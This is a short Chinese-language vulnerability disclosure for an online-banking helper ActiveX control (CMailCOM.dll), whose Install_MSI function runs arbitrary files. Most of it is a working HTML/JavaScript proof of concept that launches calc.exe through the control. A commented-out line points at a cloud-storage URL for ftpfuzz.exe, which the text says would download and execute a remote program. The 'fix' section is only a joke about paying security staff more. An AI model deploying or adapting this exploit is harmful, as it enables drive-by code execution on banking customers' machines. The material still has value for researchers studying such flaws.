中信银行网银伴侣v2.0.0.0.0.activex任意文件执行漏洞下载

漏洞名称：某商业银行网银伴侣v2.0.0.0.activex任意文件执行漏洞
影响版本：某商业银行网银伴侣v2.0.0.0
验证环境：winxp\win7中文版sp1中文，ie6.0-ie8.0)
问题文件：CMailCOM.dll
问题描述：某商业银行网银伴侣v2.0.0.0.0.activex Install_MSI函数没有对文件执行检查，导致可以远程下载木马或执行本地的任意程序。

中信银行网银伴侣v2.0.0.0.0.activex Install_MSI函数没有对文件执行检查，导致可以远程下载木马或执行本地的任意程序。其中如果“//”注释部分是远程下载ftpfuzz并允许的代码

POC代码：

<html>

<body>

<object classid='clsid:A38F2B9A-2DD3-4C88-86EE-15C01EB565EA' id='target' /></object>

<script>

var str = '';

str = str +'C:\\WINDOWS\\System32\\calc.exe';

//"http://bj.baidupcs.com/file/8afe498c9f126015a70ae0c3ce1a9b63?fid=3675168192-250528-678972838405721&time=1400665296&sign=FDTAXER-DCb740ccc5511e5e8fedcff06b081203-MfWZ2p8aIRiyTWAdPJp9n8qZ9fU%3D&to=bb&fm=N,B,U,nc&newver=1&expires=1400665896&rt=sh&r=805615569&logid=841455764&sh=1&vuk=3675168192&fn=ftpfuzz.exe" ;

target.Install_MSI(str);

</script>

</body>

</html>

漏洞修补方法：你们多发点工资给安全部门的打工仔他们就会努力想办法修复了，尽快吧，那些国外的黑帽黑客也不是吃素的哦